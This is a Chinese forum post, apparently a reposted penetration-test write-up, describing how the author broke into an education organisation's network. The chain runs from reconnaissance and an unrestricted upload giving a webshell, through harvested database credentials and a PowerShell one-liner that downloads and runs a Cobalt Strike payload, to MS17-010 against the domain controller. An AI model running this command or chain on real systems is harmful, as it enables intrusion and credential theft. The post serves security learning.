找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2090|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. j2 q7 }; B% \! c9 x 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路% Q5 I: I7 L; ^ n2 D& C- ?

5 S9 c0 F1 Y3 F9 b7 `

9 m8 v( [! Z! G I* s   / P+ I5 k. e7 V

; d9 @* v- U7 Y, e/ ^

9 C, w9 w- w" c y 正文 5 a9 n# n `4 h) e& v- a

+ U5 c/ w/ B$ b

2 h" a+ m2 Y4 o8 L' ~  0 S/ ~" b: j c5 W1 ]4 s# X

$ ^4 `' c Y3 u4 e

1 Y: z1 X, [& j, { 目标:www.xxxx.com(一家教育机构)
+ ^( a: W( H5 A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, K; J0 T) Y$ I1 S: P ?( M

$ t$ i- g$ w4 D* V! I# H( U

+ g$ g2 u% j' N2 p( t1 U vshapes= 7 k) g3 H! m0 Q

+ I0 T/ q/ Z2 n3 S$ G$ l

6 g5 O2 s2 N, _9 I6 k1 u/ B2 m 进行了简单的信息搜集
- M6 e" w- `' m v: G
, v# k. P( ^+ p2 t
4 Y/ l* f! J3 W c; ?- I

3 d. }# o- H- W! }' w, V% F

& J% [; t5 T" \6 V( R2 S4 C' J 子域名搜集 ) A/ ~5 F; d+ P* G; N7 x7 A

5 p( D' M0 F) W) R

2 [; ~$ M+ x' Q/ h) K* J* f6 H7 G vshapes= - ] N5 w0 O7 l) W* h

0 o3 P- H" p6 p' P# F

0 k0 r: j( U( {0 S fofa找资产
5 t3 g! z+ _1 @8 i9 X$ D
2 K: [ _4 S6 [' D7 H2 h2 G8 O& [
$ K9 S! t7 { R- m' h+ n. J: l

/ h3 C- v4 x1 W+ w0 W& R' H% S

9 I$ z8 C" d2 ?) e3 u: Q1 \- i vshapes=- k% n0 G/ t7 \) q$ F

6 }' R) E% g$ x; s/ x+ E

1 F8 ~: l2 I+ E/ q: E5 ?1 q; T& w 一共七个资产。去重之后只有两个。
% w) V, b$ L# J/ C# d: Q
; Z1 n- s3 [- X9 K p* h2 Y
& L. g# m& _$ s

- I, p2 u( Z2 p

! Y# @: `3 \6 X# x7 q( Z. y# A' R' ? 目录探测0 w: ~+ h5 y5 P& \

" B( u5 R: N- ]. l: C

. ^& q$ \) T, `, s+ k vshapes=8 a3 g5 T4 ~$ r* p0 v$ T1 h. @ L

& B7 a" d" j/ s+ k! G) X8 y

/ R& a7 d3 K& _ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 T# B# Z; y5 a% |0 B8 D
$ ~. ?, }* C$ ?3 S8 c
5 i. u4 E! w/ O7 H. @

9 S) n7 }7 c) H* k$ g) Z2 x$ B

6 D' @2 b/ Q' l# P 我又尝试了通过修改返回包来绕过登录界面 * q# `8 ~; m$ R9 F1 L

# z+ Z8 P' X- u4 ]/ a7 l! _4 W# ]0 @

$ R& `1 R1 H/ y/ ` vshapes=) F! K+ C- @ N, H

4 S) l/ H7 t, I2 p3 X" \+ z8 U7 U; i

" m5 c [' _! h) [5 \6 O; B 还是不行,尝试注入无果/ Q) O( g) f, Y0 g

" v0 t% v, c( @# c" Z) l [

+ ?; N8 l- T3 U% e9 h4 I! B vshapes= * M# R# w6 _% i# |3 D: Q8 {" n

. p# |5 o' B" `( b1 c0 {

1 C- u: t! F- z* n7 K# B- j: w 不过我目录探测出了一处Spring信息泄露
8 _) U% w/ f4 [$ d
" g/ I% J. Q4 j9 e
( @$ d! m( f! T, `3 f: n

4 a3 U. u& ]- X: `5 o3 m

% K' ~) \' u# U3 Z; y vshapes=, Y) ?" U: x$ [" x2 P: a

$ W; s* K( l1 w, w N: W5 I& V/ L

: ]4 @5 L% w. M6 }6 i) Y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 9 W' c2 w& ?2 z) n8 i' |' k

1 M7 H' ?4 N5 ?: m8 s* `0 U

% \9 x4 d; K# I vshapes= 2 e- A2 f% S3 u9 e2 X+ V

" x0 G7 |- L" h: ?

* P' L+ }6 R, O0 [/ g7 H5 Y* ^6 x 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ; q# c( q7 b5 o% i" k" [2 w- V

# i6 y7 G0 P: n& `

2 x5 T0 Y. ~. W vshapes= 2 [# w, M% M/ g7 P. t1 v

3 t% b1 i6 W1 @. V& {

5 A: `+ _5 c* i6 Z: \/ B 获取有些师傅到这一步就手机抓包电脑测了。 % ]0 q# {8 v8 X; q+ r. y

- s+ H8 H& ?- A% }; N0 b

7 F) e) e/ P" a) C- [5 a# r Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 ^9 }; L _: D0 i# s

5 p2 p; I7 ?& I+ l9 a

2 F9 r% n$ z0 F2 ^' \1 w, P 其中在一个公众号发现了小程序,可以进行注册。 9 I' S+ l( ?& y K. Q

( g; e0 A) @/ g

- l& P. }7 Y- o. [$ P5 c; n* T* \$ { 看到了头像上传,尝试上传获取WebShell ' z% @6 B8 P2 Q9 H) u7 a) g

% S$ d4 }& H8 n( g

/ j% o. S' l* y vshapes= 4 w: a5 Z. r& g6 w; @! k

8 ?$ ~2 X. Z( W/ I

6 d" j$ s/ }- q% K6 g 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 9 U& z7 |/ Z q

P |- }8 ]6 @5 f

9 \3 K/ }3 d3 Z/ j3 s# |7 _8 }' u- ? vshapes= 2 `' Y4 v* f" ` w/ h

4 t& S7 ~0 W9 [; ?' `

, I; t" z9 n& G) v) r 然后上了大马. k; W8 k$ X* x- ?+ `

9 _9 S# j* v5 }, _5 j

+ f. x) V/ j2 a vshapes= ( n0 `( Z& m) a6 @( `6 }

! x! \0 Z# e; F* a) ]% }) H

. P' K. q% @: U: i vshapes=% e# r6 X& F m$ w) e I3 I+ ]; K

7 C2 v6 m; D; f: ^5 H( N

9 l) o9 {& ]* E1 G 通过翻找文件发现数据库账号密码 , f% x! v2 A' b3 S+ Z

$ r2 ?2 M0 b: e9 I0 T. e

1 N+ J; n5 b7 \8 {3 h. ^- Z vshapes=4 X8 u% I. e8 f- @

2 h9 P& ]$ h2 Z* E4 R

7 L: ]3 Y7 j8 H' U* d --内网渗透 2 `- x1 a7 s. L

/ g2 F" B, ~. [( n) I

" u/ t4 W/ a- A' ? 直接通过powershell执行 cs上线. f! k7 [6 W: h- N+ I+ p

% ~ I K% } ?9 o. }4 K D6 o

* B; c$ B- Q1 O5 D8 n powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 3 ]+ G# y) C. H. l( B4 e+ \) ?. S. B

, @8 F9 \, \7 s; g) p( w% ?9 W: g w

& E* F; {. T$ d. Q, k0 d vshapes= 0 G- b; z! I+ O5 W3 c* K8 p

' _ k, {$ L* q* m2 q

+ F1 U+ C8 Q: l5 K1 v2 q3 a% [ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: \2 C I/ S( a) A$ ^- Z

% l' }' d2 \0 g4 U, ]

# i; w3 i5 Z7 M' n2 S, q vshapes=) H u, f* Y5 \8 e, T2 J. g4 W

" Z$ J" C! Y" F, t

' b3 y* |/ U6 Q4 t- X7 X 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 X+ _1 ?0 l. G. T! v
1 K$ e' d7 h( u9 w5 e
1 D6 n1 D* _: { r- P* I
1 j6 W, O0 W4 ? b, ~

0 j. {1 q& T, O+ N6 d/ K6 u2 _, F

2 D8 J& ]% d( ` a# H vshapes= : j2 ~/ z' A# Q

* O. `. N3 g( m. e1 _# d% M) z

! {! d% C+ l# y0 _/ c( w! ?: }& q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
1 J- ~" M3 t# R! X }
3 l5 X1 ~( L1 _# t: g; ]
" B) i- s3 [3 h/ r. Y( j

4 i6 `, _* h+ @6 J

1 C; R n) g$ N vshapes=& \+ S; ^; r0 m% i& \

7 {. l7 ]' ^! ^

/ ~/ Y! _, X& ]" X8 f, ^# E
3 s7 d. F3 h, [( d4 ?, ^ V! B
2 y" m1 Z$ g+ R( h9 d R
: k5 U: U" o: n/ i4 f

+ @- m: W* V, z; ~0 {

7 D) D4 f8 }5 a. i   ' c& P9 i4 \( g8 Z2 L, W* b

2 C) s% G/ V- i. \

9 j! f& t, a! j- Y4 b6 t 小结 , b- m! {9 M( C+ G' G

" D# ]' D" p. ?" U

2 F0 J0 ~( s9 ]8 n  ( c4 d9 p0 C& P% `" c

! k, R7 Z% e/ V t6 D

$ g4 M: k5 H4 W/ s* p 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 P; F W3 L9 H- [1 F

2 H, H6 E/ y* f3 ?2 Y

* h6 \9 L' ^0 X6 F9 }9 T   % D, p- ^) E9 w/ T# i# @

+ m0 m+ u' H" {
    % M% G( }1 j2 C& Q/ n/ v: R
  • . M3 k7 _ Q- M. Q   - X) h0 f4 J1 k2 `
  • . j* \& P2 {* k9 S- V
  • ( w: T/ L3 i5 @   & _0 G! [7 x7 L
  • / H0 Q6 o8 ~" z7 n! X: F! n
( y) \) g* H. F7 u$ B% F! O1 _

# F4 \. q; b& p6 n. f9 e* z 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* t# @: p: n' _$ m& S

; R5 o4 U/ ~( I% i1 `; M

8 K( `# L) L7 M( O" G   5 v0 I' e6 o3 {8 @

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表